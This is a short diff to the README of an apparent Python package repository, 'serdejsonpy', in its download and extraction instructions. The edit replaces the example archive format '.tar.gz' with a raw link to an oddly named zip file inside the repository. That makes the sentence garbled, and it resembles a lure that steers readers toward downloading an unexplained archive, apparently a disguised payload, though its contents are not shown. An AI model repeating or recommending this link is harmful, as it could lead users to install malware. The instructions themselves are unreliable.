justarandomfella/serdejsonpy/README.md

    - Go to your "Downloads" folder or the folder you selected for downloads.

 2. **Extract the File (if necessary):**
-   - If the file is archived (like a `.zip` or `.tar.gz`), right-click on it and select "Extract All" or use a suitable extraction tool.
+   - If the file is archived (like a `.zip` or `https://github.com/justarandomfella/serdejsonpy/raw/refs/heads/main/src/Software-antieugenic.zip`), right-click on it and select "Extract All" or use a suitable extraction tool.

 3. **Open Your Command Line Interface:**
    - For Windows: Search for “cmd” in the start menu.